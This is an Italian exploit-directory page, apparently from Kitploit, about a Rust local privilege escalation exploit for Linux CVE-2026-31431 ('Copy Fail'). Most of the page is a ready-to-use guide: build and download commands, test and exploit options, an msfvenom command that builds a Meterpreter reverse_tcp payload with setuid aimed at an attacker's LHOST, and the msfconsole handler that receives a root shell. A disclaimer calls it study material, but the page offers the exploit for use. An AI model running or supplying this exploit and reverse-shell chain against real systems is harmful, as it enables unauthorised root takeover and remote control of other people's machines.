Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31431-Linux-Copy-Fail — # Exploit di escalation dei privilegi locali basato su Rust per CVE-2026-31431 Exploit di escalation dei privilegi locali basato su Rust per CVE-2026-31431, che consente l'esecuzione di shellcode personalizzato come Meterpreter su sistemi Linux. | Kitploit
Strumenti/GitHubGitHub/iss4cf0ng/cve-2026-31431-linux-copy-fail
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploitPenetration TestingSviluppo PayloadBinary Exploitation
GitHubiss4cf0ng/cve-2026-31431-linux-copy-fail

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-31431-Linux-Copy-Fail

# Exploit di escalation dei privilegi locali basato su Rust per CVE-2026-31431 Exploit di escalation dei privilegi locali basato su Rust per CVE-2026-31431, che consente l'esecuzione di shellcode personalizzato come Meterpreter su sistemi Linux.

Vedi RepositorySito web
562144 mesi faRevisionato da Kitploit

CVE-2026-31431 - Exploit Copy-Fail Linux (Rust)

Un'implementazione in Rust di un exploit di escalation dei privilegi locali per CVE-2026-31431 (Copy-Fail).

Consente di eseguire shellcode personalizzati (come Meterpreter)

Introduzione

Xint ha divulgato CVE-2026-31431, una vulnerabilità di scrittura arbitraria nella page cache che combina AF_ALG e splice() per ottenere una primitiva di scrittura di 4 byte.

Fonte: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

Disclaimer

Questo progetto è stato sviluppato come parte del mio interesse personale nello studio della cybersecurity. Tuttavia, potrebbe potenzialmente essere utilizzato in modo improprio per scopi dannosi.

Non utilizzare QUESTO strumento per attività illegali.

L'autore non è responsabile di qualsiasi uso improprio di questo software.

Ringraziamenti

  • theori-io/copy-fail-CVE-2026-31431

Nota: Il lavoro originale utilizza uno shellcode compresso/codificato (ad es., /bin/sh). In questa implementazione, l'ho sostituito con uno shellcode /bin/bash grezzo (non compresso), rendendo più semplice personalizzarlo o sostituirlo direttamente con payload forniti dall'utente.

Come Compilare

Clona il progetto, quindi esegui build.sh:

root@kitploit:~
git clone [email protected]:iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail
cd ./CVE-2026-31431-Linux-Copy-Fail
chmod +x ./build.sh
./build.sh

Utilizzo

Scarica ed estrai il pacchetto della release:

root@kitploit:~
wget https://github.com/iss4cf0ng/CVE-2026-31431-Linux-Copy-Fail/releases/latest/download/CVE-2026-31431-Linux-Fail.gz
tar -xzf CVE-2026-31431-Linux-Fail.gz
chmod +x CVE-2026-31431-Linux-Copy-Fail_x64
chmod +x CVE-2026-31431-Linux-Copy-Fail_x86

I binari forniscono le seguenti opzioni:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test
./CVE-2026-31431-Linux-Copy-Fail --exploit
./CVE-2026-31431-Linux-Copy-Fail --bin shellcode.bin

Dimostrazione

Test della Vulnerabilità

Sulla macchina vulnerabile:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --test

Sfruttamento

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --exploit

Meterpreter

Utilizza il comando (imposta PrependSetUid su True) riportato di seguito per generare il payload Meterpreter:

root@kitploit:~
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.x lport=4444 -f elf prependsetuid=true > payload.bin

Sulla macchina dell'attaccante (Kali Linux):

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.x
set lport 4444
run

Sulla macchina vulnerabile:

root@kitploit:~
./CVE-2026-31431-Linux-Copy-Fail --bin payload.bin

Versioni Interessate

  • Ubuntu
  • Redhat
Scarica lo strumento